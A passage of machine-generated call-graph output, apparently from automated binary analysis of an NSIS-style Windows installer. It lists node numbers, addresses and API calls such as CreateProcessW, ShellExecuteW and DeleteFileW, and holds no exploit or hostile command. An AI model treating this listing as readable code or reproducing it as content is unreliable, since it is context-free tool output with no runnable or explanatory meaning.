405f55 RegCloseKey 3391->3393 3392->3379 3393->3392 3395->3379 3396->3379 3397->3365 3399 405d38 3398->3399 3400 405d4e 3399->3400 3401 405d3f CharNextW 3399->3401 3400->3388 3401->3399 3403 40613c 3402->3403 3404 40611f 3402->3404 3406 4061b3 3403->3406 3407 406159 3403->3407 3408 40277f WritePrivateProfileStringW 3403->3408 3405 406129 CloseHandle 3404->3405 3404->3408 3405->3408 3406->3408 3409 4061bc lstrcatW lstrlenW WriteFile 3406->3409 3407->3409 3410 406162 GetFileAttributesW 3407->3410 3409->3408 3415 405e7c GetFileAttributesW CreateFileW 3410->3415 3412 40617e 3412->3408 3413 4061a8 SetFilePointer 3412->3413 3414 40618e WriteFile 3412->3414 3413->3406 3414->3413 3415->3412 4819 402797 4820 40145c 18 API calls 4819->4820 4821 4027ae 4820->4821 4822 40145c 18 API calls 4821->4822 4823 4027b7 4822->4823 4824 40145c 18 API calls 4823->4824 4825 4027c0 GetPrivateProfileStringW lstrcmpW 4824->4825 4826 401e9a 4827 40145c 18 API calls 4826->4827 4828 401ea1 4827->4828 4829 401446 18 API calls 4828->4829 4830 401eab wsprintfW 4829->4830 3790 401a1f 3791 40145c 18 API calls 3790->3791 3792 401a26 3791->3792 3793 4062cf 11 API calls 3792->3793 3794 401a49 3793->3794 3795 401a64 3794->3795 3796 401a5c 3794->3796 3865 406035 lstrcpynW 3795->3865 3864 406035 lstrcpynW 3796->3864 3799 401a6f 3866 40674e lstrlenW CharPrevW 3799->3866 3800 401a62 3803 406064 5 API calls 3800->3803 3834 401a81 3803->3834 3804 406301 2 API calls 3804->3834 3807 401a98 CompareFileTime 3807->3834 3808 401ba9 3809 404f9e 25 API calls 3808->3809 3811 401bb3 3809->3811 3810 401b5d 3812 404f9e 25 API calls 3810->3812 3843 40337f 3811->3843 3814 401b70 3812->3814 3818 4062cf 11 API calls 3814->3818 3816 406035 lstrcpynW 3816->3834 3817 4062cf 11 API calls 3819 401bda 3817->3819 3823 401b8b 3818->3823 3820 401be9 SetFileTime 3819->3820 3821 401bf8 CloseHandle 3819->3821 3820->3821 3821->3823 3824 401c09 3821->3824 3822 406831 18 API calls 3822->3834 3825 401c21 3824->3825 3826 401c0e 3824->3826 
3827 406831 18 API calls 3825->3827 3828 406831 18 API calls 3826->3828 3829 401c29 3827->3829 3831 401c16 lstrcatW 3828->3831 3832 4062cf 11 API calls 3829->3832 3831->3829 3835 401c34 3832->3835 3833 401b50 3837 401b93 3833->3837 3838 401b53 3833->3838 3834->3804 3834->3807 3834->3808 3834->3810 3834->3816 3834->3822 3834->3833 3836 4062cf 11 API calls 3834->3836 3842 405e7c GetFileAttributesW CreateFileW 3834->3842 3869 405e5c GetFileAttributesW 3834->3869 3872 405ccc 3834->3872 3839 405ccc MessageBoxIndirectW 3835->3839 3836->3834 3840 4062cf 11 API calls 3837->3840 3841 4062cf 11 API calls 3838->3841 3839->3823 3840->3823 3841->3810 3842->3834 3844 40339a 3843->3844 3845 4033c7 3844->3845 3878 403368 SetFilePointer 3844->3878 3876 403336 ReadFile 3845->3876 3849 401bc6 3849->3817 3850 403546 3852 40354a 3850->3852 3853 40356e 3850->3853 3851 4033eb GetTickCount 3851->3849 3856 403438 3851->3856 3854 403336 ReadFile 3852->3854 3853->3849 3857 403336 ReadFile 3853->3857 3858 40358d WriteFile 3853->3858 3854->3849 3855 403336 ReadFile 3855->3856 3856->3849 3856->3855 3860 40348a GetTickCount 3856->3860 3861 4034af MulDiv wsprintfW 3856->3861 3863 4034f3 WriteFile 3856->3863 3857->3853 3858->3849 3859 4035a1 3858->3859 3859->3849 3859->3853 3860->3856 3862 404f9e 25 API calls 3861->3862 3862->3856 3863->3849 3863->3856 3864->3800 3865->3799 3867 401a75 lstrcatW 3866->3867 3868 40676b lstrcatW 3866->3868 3867->3800 3868->3867 3870 405e79 3869->3870 3871 405e6b SetFileAttributesW 3869->3871 3870->3834 3871->3870 3873 405ce1 3872->3873 3874 405d2f 3873->3874 3875 405cf7 MessageBoxIndirectW 3873->3875 3874->3834 3875->3874 3877 403357 3876->3877 3877->3849 3877->3850 3877->3851 3878->3845 4831 40209f GetDlgItem GetClientRect 4832 40145c 18 API calls 4831->4832 4833 4020cf LoadImageW SendMessageW 4832->4833 4834 4030e3 4833->4834 4835 4020ed DeleteObject 4833->4835 4835->4834 4836 402b9f 4837 401446 18 API calls 4836->4837 4841 402ba7 4837->4841 4838 402c4a 4839 402bdf 
ReadFile 4839->4841 4848 402c3d 4839->4848 4840 401446 18 API calls 4840->4848 4841->4838 4841->4839 4842 402c06 MultiByteToWideChar 4841->4842 4843 402c3f 4841->4843 4844 402c4f 4841->4844 4841->4848 4842->4841 4842->4844 4849 405f7d wsprintfW 4843->4849 4846 402c6b SetFilePointer 4844->4846 4844->4848 4846->4848 4847 402d17 ReadFile 4847->4848 4848->4838 4848->4840 4848->4847 4849->4838 4850 402b23 GlobalAlloc 4851 402b39 4850->4851 4852 402b4b 4850->4852 4853 401446 18 API calls 4851->4853 4854 40145c 18 API calls 4852->4854 4856 402b41 4853->4856 4855 402b52 WideCharToMultiByte lstrlenA 4854->4855 4855->4856 4857 402b84 WriteFile 4856->4857 4858 402b93 4856->4858 4857->4858 4859 402384 GlobalFree 4857->4859 4859->4858 4861 4040a3 4862 4040b0 lstrcpynW lstrlenW 4861->4862 4863 4040ad 4861->4863 4863->4862 3429 4054a5 3430 4055f9 3429->3430 3431 4054bd 3429->3431 3433 40564a 3430->3433 3434 40560a GetDlgItem GetDlgItem 3430->3434 3431->3430 3432 4054c9 3431->3432 3436 4054d4 SetWindowPos 3432->3436 3437 4054e7 3432->3437 3435 4056a4 3433->3435 3443 40139d 80 API calls 3433->3443 3438 403d6b 19 API calls 3434->3438 3444 4055f4 3435->3444 3499 403ddb 3435->3499 3436->3437 3440 405504 3437->3440 3441 4054ec ShowWindow 3437->3441 3442 405634 SetClassLongW 3438->3442 3445 405526 3440->3445 3446 40550c DestroyWindow 3440->3446 3441->3440 3447 40141d 80 API calls 3442->3447 3450 40567c 3443->3450 3448 40552b SetWindowLongW 3445->3448 3449 40553c 3445->3449 3451 405908 3446->3451 3447->3433 3448->3444 3452 4055e5 3449->3452 3453 405548 GetDlgItem 3449->3453 3450->3435 3454 405680 SendMessageW 3450->3454 3451->3444 3460 405939 ShowWindow 3451->3460 3519 403df6 3452->3519 3457 405578 3453->3457 3458 40555b SendMessageW IsWindowEnabled 3453->3458 3454->3444 3455 40141d 80 API calls 3468 4056b6 3455->3468 3456 40590a DestroyWindow KiUserCallbackDispatcher 3456->3451 3462 405585 3457->3462 3465 4055cc SendMessageW 3457->3465 3466 405598 3457->3466 3474 40557d 3457->3474 
3458->3444 3458->3457 3460->3444 3461 406831 18 API calls 3461->3468 3462->3465 3462->3474 3464 403d6b 19 API calls 3464->3468 3465->3452 3469 4055a0 3466->3469 3470 4055b5 3466->3470 3467 4055b3 3467->3452 3468->3444 3468->3455 3468->3456 3468->3461 3468->3464 3490 40584a DestroyWindow 3468->3490 3502 403d6b 3468->3502 3513 40141d 3469->3513 3471 40141d 80 API calls 3470->3471 3473 4055bc 3471->3473 3473->3452 3473->3474 3516 403d44 3474->3516 3476 405731 GetDlgItem 3477 405746 3476->3477 3478 40574f ShowWindow KiUserCallbackDispatcher 3476->3478 3477->3478 3505 403db1 KiUserCallbackDispatcher 3478->3505 3480 405779 EnableWindow 3483 40578d 3480->3483 3481 405792 GetSystemMenu EnableMenuItem SendMessageW 3482 4057c2 SendMessageW 3481->3482 3481->3483 3482->3483 3483->3481 3506 403dc4 SendMessageW 3483->3506 3507 406035 lstrcpynW 3483->3507 3486 4057f0 lstrlenW 3487 406831 18 API calls 3486->3487 3488 405806 SetWindowTextW 3487->3488 3508 40139d 3488->3508 3490->3451 3491 405864 CreateDialogParamW 3490->3491 3491->3451 3492 405897 3491->3492 3493 403d6b 19 API calls 3492->3493 3494 4058a2 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3493->3494 3495 40139d 80 API calls 3494->3495 3496 4058e8 3495->3496 3496->3444 3497 4058f0 ShowWindow 3496->3497 3498 403ddb SendMessageW 3497->3498 3498->3451 3500 403df3 3499->3500 3501 403de4 SendMessageW 3499->3501 3500->3468 3501->3500 3503 406831 18 API calls 3502->3503 3504 403d76 SetDlgItemTextW 3503->3504 3504->3476 3505->3480 3506->3483 3507->3486 3511 4013a4 3508->3511 3509 401410 3509->3468 3511->3509 3512 4013dd MulDiv SendMessageW 3511->3512 3533 4015a0 3511->3533 3512->3511 3514 40139d 80 API calls 3513->3514 3515 401432 3514->3515 3515->3474 3517 403d51 SendMessageW 3516->3517 3518 403d4b 3516->3518 3517->3467 3518->3517 3520 403e0b GetWindowLongW 3519->3520 3530 403e94 3519->3530 3521 403e1c 3520->3521 3520->3530 3522 403e2b GetSysColor 3521->3522 3523 403e2e 3521->3523 3522->3523 3524 403e34 SetTextColor 
3523->3524 3525 403e3e SetBkMode 3523->3525 3524->3525 3526 403e56 GetSysColor 3525->3526 3527 403e5c 3525->3527 3526->3527 3528 403e63 SetBkColor 3527->3528 3529 403e6d 3527->3529 3528->3529 3529->3530 3531 403e80 DeleteObject 3529->3531 3532 403e87 CreateBrushIndirect 3529->3532 3530->3444 3531->3532 3532->3530 3534 4015fa 3533->3534 3613 40160c 3533->3613 3535 401601 3534->3535 3536 401742 3534->3536 3537 401962 3534->3537 3538 4019ca 3534->3538 3539 40176e 3534->3539 3540 401650 3534->3540 3541 4017b1 3534->3541 3542 401672 3534->3542 3543 401693 3534->3543 3544 401616 3534->3544 3545 4016d6 3534->3545 3546 401736 3534->3546 3547 401897 3534->3547 3548 4018db 3534->3548 3549 40163c 3534->3549 3550 4016bd 3534->3550 3534->3613 3559 4062cf 11 API calls 3535->3559 3551 401751 ShowWindow 3536->3551 3552 401758 3536->3552 3556 40145c 18 API calls 3537->3556 3563 40145c 18 API calls 3538->3563 3553 40145c 18 API calls 3539->3553 3577 4062cf 11 API calls 3540->3577 3557 40145c 18 API calls 3541->3557 3554 40145c 18 API calls 3542->3554 3558 401446 18 API calls 3543->3558 3562 40145c 18 API calls 3544->3562 3576 401446 18 API calls 3545->3576 3545->3613 3546->3613 3667 405f7d wsprintfW 3546->3667 3555 40145c 18 API calls 3547->3555 3560 40145c 18 API calls 3548->3560 3564 401647 PostQuitMessage 3549->3564 3549->3613 3561 4062cf 11 API calls 3550->3561 3551->3552 3565 401765 ShowWindow 3552->3565 3552->3613 3566 401775 3553->3566 3567 401678 3554->3567 3568 40189d 3555->3568 3569 401968 GetFullPathNameW 3556->3569 3570 4017b8 3557->3570 3571 40169a 3558->3571 3559->3613 3572 4018e2 3560->3572 3573 4016c7 SetForegroundWindow 3561->3573 3574 40161c 3562->3574 3575 4019d1 SearchPathW 3563->3575 3564->3613 3565->3613 3579 4062cf 11 API calls 3566->3579 3580 4062cf 11 API calls 3567->3580 3658 406301 FindFirstFileW 3568->3658 3582 4019a1 3569->3582 3583 40197f 3569->3583 3584 4062cf 11 API calls 3570->3584 3585 4062cf 11 API calls 3571->3585 3586 40145c 18 API calls 
3572->3586 3573->3613 3587 4062cf 11 API calls 3574->3587 3575->3546 3575->3613 3576->3613 3588 401664 3577->3588 3589 401785 SetFileAttributesW 3579->3589 3590 401683 3580->3590 3602 4019b8 GetShortPathNameW 3582->3602 3582->3613 3583->3582 3608 406301 2 API calls 3583->3608 3592 4017c9 3584->3592 3593 4016a7 Sleep 3585->3593 3594 4018eb 3586->3594 3595 401627 3587->3595 3596 40139d 65 API calls 3588->3596 3597 40179a 3589->3597 3589->3613 3606 404f9e 25 API calls 3590->3606 3640 405d85 CharNextW CharNextW 3592->3640 3593->3613 3603 40145c 18 API calls 3594->3603 3604 404f9e 25 API calls 3595->3604 3596->3613 3605 4062cf 11 API calls 3597->3605 3598 4018c2 3609 4062cf 11 API calls 3598->3609 3599 4018a9 3607 4062cf 11 API calls 3599->3607 3602->3613 3611 4018f5 3603->3611 3604->3613 3605->3613 3606->3613 3607->3613 3612 401991 3608->3612 3609->3613 3610 4017d4 3614 401864 3610->3614 3617 405d32 CharNextW 3610->3617 3635 4062cf 11 API calls 3610->3635 3615 4062cf 11 API calls 3611->3615 3612->3582 3666 406035 lstrcpynW 3612->3666 3613->3511 3614->3590 3616 40186e 3614->3616 3618 401902 MoveFileW 3615->3618 3646 404f9e 3616->3646 3621 4017e6 CreateDirectoryW 3617->3621 3622 401912 3618->3622 3623 40191e 3618->3623 3621->3610 3625 4017fe GetLastError 3621->3625 3622->3590 3629 406301 2 API calls 3623->3629 3639 401942 3623->3639 3627 401827 GetFileAttributesW 3625->3627 3628 40180b GetLastError 3625->3628 3627->3610 3632 4062cf 11 API calls 3628->3632 3633 401929 3629->3633 3630 401882 SetCurrentDirectoryW 3630->3613 3631 4062cf 11 API calls 3634 40195c 3631->3634 3632->3610 3633->3639 3661 406c94 3633->3661 3634->3613 3635->3610 3638 404f9e 25 API calls 3638->3639 3639->3631 3641 405da2 3640->3641 3644 405db4 3640->3644 3643 405daf CharNextW 3641->3643 3641->3644 3642 405dd8 3642->3610 3643->3642 3644->3642 3645 405d32 CharNextW 3644->3645 3645->3644 3647 404fb7 3646->3647 3648 401875 3646->3648 3649 404fd5 lstrlenW 3647->3649 3650 406831 18 API calls 3647->3650 
3657 406035 lstrcpynW 3648->3657 3651 404fe3 lstrlenW 3649->3651 3652 404ffe 3649->3652 3650->3649 3651->3648 3653 404ff5 lstrcatW 3651->3653 3654 405011 3652->3654 3655 405004 SetWindowTextW 3652->3655 3653->3652 3654->3648 3656 405017 SendMessageW SendMessageW SendMessageW 3654->3656 3655->3654 3656->3648 3657->3630 3659 4018a5 3658->3659 3660 406317 FindClose 3658->3660 3659->3598 3659->3599 3660->3659 3668 406328 GetModuleHandleA 3661->3668 3665 401936 3665->3638 3666->3582 3667->3613 3669 406340 LoadLibraryA 3668->3669 3670 40634b GetProcAddress 3668->3670 3669->3670 3671 406359 3669->3671 3670->3671 3671->3665 3672 406ac5 lstrcpyW 3671->3672 3673 406b13 GetShortPathNameW 3672->3673 3674 406aea 3672->3674 3675 406b2c 3673->3675 3676 406c8e 3673->3676 3698 405e7c GetFileAttributesW CreateFileW 3674->3698 3675->3676 3679 406b34 WideCharToMultiByte 3675->3679 3676->3665 3678 406af3 CloseHandle GetShortPathNameW 3678->3676 3680 406b0b 3678->3680 3679->3676 3681 406b51 WideCharToMultiByte 3679->3681 3680->3673 3680->3676 3681->3676 3682 406b69 wsprintfA 3681->3682 3683 406831 18 API calls 3682->3683 3684 406b95 3683->3684 3699 405e7c GetFileAttributesW CreateFileW 3684->3699 3686 406ba2 3686->3676 3687 406baf GetFileSize GlobalAlloc 3686->3687 3688 406bd0 ReadFile 3687->3688 3689 406c84 CloseHandle 3687->3689 3688->3689 3690 406bea 3688->3690 3689->3676 3690->3689 3700 405de2 lstrlenA 3690->3700 3693 406c03 lstrcpyA 3696 406c25 3693->3696 3694 406c17 3695 405de2 4 API calls 3694->3695 3695->3696 3697 406c5c SetFilePointer WriteFile GlobalFree 3696->3697 3697->3689 3698->3678 3699->3686 3701 405e23 lstrlenA 3700->3701 3702 405e2b 3701->3702 3703 405dfc lstrcmpiA 3701->3703 3702->3693 3702->3694 3703->3702 3704 405e1a CharNextA 3703->3704 3704->3701 4864 402da5 4865 4030e3 4864->4865 4866 402dac 4864->4866 4867 401446 18 API calls 4866->4867 4868 402db8 4867->4868 4869 402dbf SetFilePointer 4868->4869 4869->4865 4870 402dcf 4869->4870 4870->4865 4872 405f7d wsprintfW 
4870->4872 4872->4865 4873 4049a8 GetDlgItem GetDlgItem 4874 4049fe 7 API calls 4873->4874 4879 404c16 4873->4879 4875 404aa2 DeleteObject 4874->4875 4876 404a96 SendMessageW 4874->4876 4877 404aad 4875->4877 4876->4875 4880 404ae4 4877->4880 4883 406831 18 API calls 4877->4883 4878 404cfb 4881 404da0 4878->4881 4882 404c09 4878->4882 4887 404d4a SendMessageW 4878->4887 4879->4878 4891 40487a 5 API calls 4879->4891 4904 404c86 4879->4904 4886 403d6b 19 API calls 4880->4886 4884 404db5 4881->4884 4885 404da9 SendMessageW 4881->4885 4888 403df6 8 API calls 4882->4888 4889 404ac6 SendMessageW SendMessageW 4883->4889 4896 404dc7 ImageList_Destroy 4884->4896 4897 404dce 4884->4897 4902 404dde 4884->4902 4885->4884 4892 404af8 4886->4892 4887->4882 4894 404d5f SendMessageW 4887->4894 4895 404f97 4888->4895 4889->4877 4890 404ced SendMessageW 4890->4878 4891->4904 4898 403d6b 19 API calls 4892->4898 4893 404f48 4893->4882 4903 404f5d ShowWindow GetDlgItem ShowWindow 4893->4903 4899 404d72 4894->4899 4896->4897 4900 404dd7 GlobalFree 4897->4900 4897->4902 4906 404b09 4898->4906 4908 404d83 SendMessageW 4899->4908 4900->4902 4901 404bd6 GetWindowLongW SetWindowLongW 4905 404bf0 4901->4905 4902->4893 4907 40141d 80 API calls 4902->4907 4917 404e10 4902->4917 4903->4882 4904->4878 4904->4890 4909 404bf6 ShowWindow 4905->4909 4910 404c0e 4905->4910 4906->4901 4912 404b65 SendMessageW 4906->4912 4913 404bd0 4906->4913 4915 404b93 SendMessageW 4906->4915 4916 404ba7 SendMessageW 4906->4916 4907->4917 4908->4881 4924 403dc4 SendMessageW 4909->4924 4925 403dc4 SendMessageW 4910->4925 4912->4906 4913->4901 4913->4905 4915->4906 4916->4906 4918 404e54 4917->4918 4921 404e3e SendMessageW 4917->4921 4919 404f1f InvalidateRect 4918->4919 4923 404ecd SendMessageW SendMessageW 4918->4923 4919->4893 4920 404f35 4919->4920 4922 4043d9 21 API calls 4920->4922 4921->4918 4922->4893 4923->4918 4924->4882 4925->4879 4926 4030a9 SendMessageW 4927 4030c2 InvalidateRect 4926->4927 4928 4030e3 
4926->4928 4927->4928 3879 4038af #17 SetErrorMode OleInitialize 3880 406328 3 API calls 3879->3880 3881 4038f2 SHGetFileInfoW 3880->3881 3953 406035 lstrcpynW 3881->3953 3883 40391d GetCommandLineW 3954 406035 lstrcpynW 3883->3954 3885 40392f GetModuleHandleW 3886 403947 3885->3886 3887 405d32 CharNextW 3886->3887 3888 403956 CharNextW 3887->3888 3899 403968 3888->3899 3889 403a02 3890 403a21 GetTempPathW 3889->3890 3955 4037f8 3890->3955 3892 403a37 3894 403a3b GetWindowsDirectoryW lstrcatW 3892->3894 3895 403a5f DeleteFileW 3892->3895 3893 405d32 CharNextW 3893->3899 3897 4037f8 11 API calls 3894->3897 3963 4035b3 GetTickCount GetModuleFileNameW 3895->3963 3900 403a57 3897->3900 3898 403a73 3901 403af8 3898->3901 3903 405d32 CharNextW 3898->3903 3939 403add 3898->3939 3899->3889 3899->3893 3906 403a04 3899->3906 3900->3895 3900->3901 4048 403885 3901->4048 3907 403a8a 3903->3907 4055 406035 lstrcpynW 3906->4055 3918 403b23 lstrcatW lstrcmpiW 3907->3918 3919 403ab5 3907->3919 3908 403aed 3911 406113 9 API calls 3908->3911 3909 403bfa 3912 403c7d 3909->3912 3914 406328 3 API calls 3909->3914 3910 403b0d 3913 405ccc MessageBoxIndirectW 3910->3913 3911->3901 3915 403b1b ExitProcess 3913->3915 3917 403c09 3914->3917 3921 406328 3 API calls 3917->3921 3918->3901 3920 403b3f CreateDirectoryW SetCurrentDirectoryW 3918->3920 4056 4067aa 3919->4056 3923 403b62 3920->3923 3924 403b57 3920->3924 3925 403c12 3921->3925 4073 406035 lstrcpynW 3923->4073 4072 406035 lstrcpynW 3924->4072 3929 406328 3 API calls 3925->3929 3932 403c1b 3929->3932 3931 403b70 4074 406035 lstrcpynW 3931->4074 3933 403c69 ExitWindowsEx 3932->3933 3938 403c29 GetCurrentProcess 3932->3938 3933->3912 3937 403c76 3933->3937 3934 403ad2 4071 406035 lstrcpynW 3934->4071 3940 40141d 80 API calls 3937->3940 3942 403c39 3938->3942 3991 405958 3939->3991 3940->3912 3941 406831 18 API calls 3943 403b98 DeleteFileW 3941->3943 3942->3933 3944 403ba5 CopyFileW 3943->3944 3950 403b7f 3943->3950 3944->3950 3945 
403bee 3946 406c94 42 API calls 3945->3946 3948 403bf5 3946->3948 3947 406c94 42 API calls 3947->3950 3948->3901 3949 406831 18 API calls 3949->3950 3950->3941 3950->3945 3950->3947 3950->3949 3952 403bd9 CloseHandle 3950->3952 4075 405c6b CreateProcessW 3950->4075 3952->3950 3953->3883 3954->3885 3956 406064 5 API calls 3955->3956 3957 403804 3956->3957 3958 40380e 3957->3958 3959 40674e 3 API calls 3957->3959 3958->3892 3960 403816 CreateDirectoryW 3959->3960 3961 405eab 2 API calls 3960->3961 3962 40382a 3961->3962 3962->3892 4078 405e7c GetFileAttributesW CreateFileW 3963->4078 3965 4035f3 3985 403603 3965->3985 4079 406035 lstrcpynW 3965->4079 3967 403619 4080 40677d lstrlenW 3967->4080 3971 40362a GetFileSize 3972 403726 3971->3972 3986 403641 3971->3986 4085 4032d2 3972->4085 3974 40372f 3976 40376b GlobalAlloc 3974->3976 3974->3985 4097 403368 SetFilePointer 3974->4097 3975 403336 ReadFile 3975->3986 4096 403368 SetFilePointer 3976->4096 3979 4037e9 3982 4032d2 6 API calls 3979->3982 3980 403786 3983 40337f 33 API calls 3980->3983 3981 40374c 3984 403336 ReadFile 3981->3984 3982->3985 3989 403792 3983->3989 3988 403757 3984->3988 3985->3898 3986->3972 3986->3975 3986->3979 3986->3985 3987 4032d2 6 API calls 3986->3987 3987->3986 3988->3976 3988->3985 3989->3985 3989->3989 3990 4037c0 SetFilePointer 3989->3990 3990->3985 3992 406328 3 API calls 3991->3992 3993 40596c 3992->3993 3994 405972 3993->3994 3995 405984 3993->3995 4111 405f7d wsprintfW 3994->4111 3996 405eff 3 API calls 3995->3996 3997 4059b5 3996->3997 3999 4059d4 lstrcatW 3997->3999 4001 405eff 3 API calls 3997->4001 4000 405982 3999->4000 4102 403ec1 4000->4102 4001->3999 4004 4067aa 18 API calls 4005 405a06 4004->4005 4006 405a9c 4005->4006 4008 405eff 3 API calls 4005->4008 4007 4067aa 18 API calls 4006->4007 4009 405aa2 4007->4009 4010 405a38 4008->4010 4011 405ab2 4009->4011 4012 406831 18 API calls 4009->4012 4010->4006 4014 405a5b lstrlenW 4010->4014 4017 405d32 CharNextW 4010->4017 4013 
405ad2 LoadImageW 4011->4013 4113 403ea0 4011->4113 4012->4011 4015 405b92 4013->4015 4016 405afd RegisterClassW 4013->4016 4018 405a69 lstrcmpiW 4014->4018 4019 405a8f 4014->4019 4023 40141d 80 API calls 4015->4023 4021 405b9c 4016->4021 4022 405b45 SystemParametersInfoW CreateWindowExW 4016->4022 4024 405a56 4017->4024 4018->4019 4025 405a79 GetFileAttributesW 4018->4025 4027 40674e 3 API calls 4019->4027 4021->3908 4022->4015 4028 405b98 4023->4028 4024->4014 4029 405a85 4025->4029 4026 405ac8 4026->4013 4030 405a95 4027->4030 4028->4021 4031 403ec1 19 API calls 4028->4031 4029->4019 4032 40677d 2 API calls 4029->4032 4112 406035 lstrcpynW 4030->4112 4034 405ba9 4031->4034 4032->4019 4035 405bb5 ShowWindow LoadLibraryW 4034->4035 4036 405c38 4034->4036 4037 405bd4 LoadLibraryW 4035->4037 4038 405bdb GetClassInfoW 4035->4038 4039 405073 83 API calls 4036->4039 4037->4038 4040 405c05 DialogBoxParamW 4038->4040 4041 405bef GetClassInfoW RegisterClassW 4038->4041 4042 405c3e 4039->4042 4045 40141d 80 API calls 4040->4045 4041->4040 4043 405c42 4042->4043 4044 405c5a 4042->4044 4043->4021 4047 40141d 80 API calls 4043->4047 4046 40141d 80 API calls 4044->4046 4045->4021 4046->4021 4047->4021 4049 40389d 4048->4049 4050 40388f CloseHandle 4048->4050 4120 403caf 4049->4120 4050->4049 4055->3890 4173 406035 lstrcpynW 4056->4173 4058 4067bb 4059 405d85 4 API calls 4058->4059 4060 4067c1 4059->4060 4061 406064 5 API calls 4060->4061 4068 403ac3 4060->4068 4064 4067d1 4061->4064 4062 406809 lstrlenW 4063 406810 4062->4063 4062->4064 4066 40674e 3 API calls 4063->4066 4064->4062 4065 406301 2 API calls 4064->4065 4064->4068 4069 40677d 2 API calls 4064->4069 4065->4064 4067 406816 GetFileAttributesW 4066->4067 4067->4068 4068->3901 4070 406035 lstrcpynW 4068->4070 4069->4062 4070->3934 4071->3939 4072->3923 4073->3931 4074->3950 4076 405ca6 4075->4076 4077 405c9a CloseHandle 4075->4077 4076->3950 4077->4076 4078->3965 4079->3967 4081 40678c 4080->4081 4082 406792 CharPrevW 
4081->4082 4083 40361f 4081->4083 4082->4081 4082->4083 4084 406035 lstrcpynW 4083->4084 4084->3971 4086 4032f3 4085->4086 4087 4032db 4085->4087 4090 403303 GetTickCount 4086->4090 4091 4032fb 4086->4091 4088 4032e4 DestroyWindow 4087->4088 4089 4032eb 4087->4089 4088->4089 4089->3974 4093 403311 CreateDialogParamW ShowWindow 4090->4093 4094 403334 4090->4094 4098 40635e 4091->4098 4093->4094 4094->3974 4096->3980 4097->3981 4099 40637b PeekMessageW 4098->4099 4100 406371 DispatchMessageW 4099->4100 4101 403301 4099->4101 4100->4099 4101->3974 4103 403ed5 4102->4103 4118 405f7d wsprintfW 4103->4118 4105 403f49 4106 406831 18 API calls 4105->4106 4107 403f55 SetWindowTextW 4106->4107 4108 403f70 4107->4108 4109 403f8b 4108->4109 4110 406831 18 API calls 4108->4110 4109->4004 4110->4108 4111->4000 4112->4006 4119 406035 lstrcpynW 4113->4119 4115 403eb4 4116 40674e 3 API calls 4115->4116 4117 403eba lstrcatW 4116->4117 4117->4026 4118->4105 4119->4115 4121 403cbd 4120->4121 4122 4038a2 4121->4122 4123 403cc2 FreeLibrary GlobalFree 4121->4123 4124 406cc7 4122->4124 4123->4122 4123->4123 4125 4067aa 18 API calls 4124->4125 4126 406cda 4125->4126 4127 406ce3 DeleteFileW 4126->4127 4128 406cfa 4126->4128 4167 4038ae CoUninitialize 4127->4167 4129 406e77 4128->4129 4171 406035 lstrcpynW 4128->4171 4135 406301 2 API calls 4129->4135 4155 406e84 4129->4155 4129->4167 4131 406d25 4132 406d39 4131->4132 4133 406d2f lstrcatW 4131->4133 4136 40677d 2 API calls 4132->4136 4134 406d3f 4133->4134 4138 406d4f lstrcatW 4134->4138 4140 406d57 lstrlenW FindFirstFileW 4134->4140 4137 406e90 4135->4137 4136->4134 4141 40674e 3 API calls 4137->4141 4137->4167 4138->4140 4139 4062cf 11 API calls 4139->4167 4144 406e67 4140->4144 4168 406d7e 4140->4168 4142 406e9a 4141->4142 4145 4062cf 11 API calls 4142->4145 4143 405d32 CharNextW 4143->4168 4144->4129 4146 406ea5 4145->4146 4147 405e5c 2 API calls 4146->4147 4148 406ead RemoveDirectoryW 4147->4148 4152 406ef0 4148->4152 4153 406eb9 
4148->4153 4149 406e44 FindNextFileW 4151 406e5c FindClose 4149->4151 4149->4168 4151->4144 4154 404f9e 25 API calls 4152->4154 4153->4155 4156 406ebf 4153->4156 4154->4167 4155->4139 4158 4062cf 11 API calls 4156->4158 4157 4062cf 11 API calls 4157->4168 4159 406ec9 4158->4159 4162 404f9e 25 API calls 4159->4162 4160 406cc7 72 API calls 4160->4168 4161 405e5c 2 API calls 4163 406dfa DeleteFileW 4161->4163 4164 406ed3 4162->4164 4163->4168 4165 406c94 42 API calls 4164->4165 4165->4167 4166 404f9e 25 API calls 4166->4149 4167->3909 4167->3910 4168->4143 4168->4149 4168->4157 4168->4160 4168->4161 4168->4166 4169 404f9e 25 API calls 4168->4169 4170 406c94 42 API calls 4168->4170 4172 406035 lstrcpynW 4168->4172 4169->4168 4170->4168 4171->4131 4172->4168 4173->4058 4929 401cb2 4930 40145c 18 API calls 4929->4930 4931 401c54 4930->4931 4932 4062cf 11 API calls 4931->4932 4933 401c64 4931->4933 4934 401c59 4932->4934 4935 406cc7 81 API calls 4934->4935 4935->4933 3705 4021b5 3706 40145c 18 API calls 3705->3706 3707 4021bb 3706->3707 3708 40145c 18 API calls 3707->3708 3709 4021c4 3708->3709 3710 40145c 18 API calls 3709->3710 3711 4021cd 3710->3711 3712 40145c 18 API calls 3711->3712 3713 4021d6 3712->3713 3714 404f9e 25 API calls 3713->3714 3715 4021e2 ShellExecuteW 3714->3715 3716 40221b 3715->3716 3717 40220d 3715->3717 3718 4062cf 11 API calls 3716->3718 3719 4062cf 11 API calls 3717->3719 3720 402230 3718->3720 3719->3716 4936 402238 4937 40145c 18 API calls 4936->4937 4938 40223e 4937->4938 4939 4062cf 11 API calls 4938->4939 4940 40224b 4939->4940 4941 404f9e 25 API calls 4940->4941 4942 402255 4941->4942 4943 405c6b 2 API calls 4942->4943 4944 40225b 4943->4944 4945 4062cf 11 API calls 4944->4945 4953 4022ac CloseHandle 4944->4953 4950 40226d 4945->4950 4947 4030e3 4948 402283 WaitForSingleObject 4949 402291 GetExitCodeProcess 4948->4949 4948->4950 4952 4022a3 4949->4952 4949->4953 4950->4948 4951 40635e 2 API calls 4950->4951 4950->4953 4951->4948 4955 405f7d 
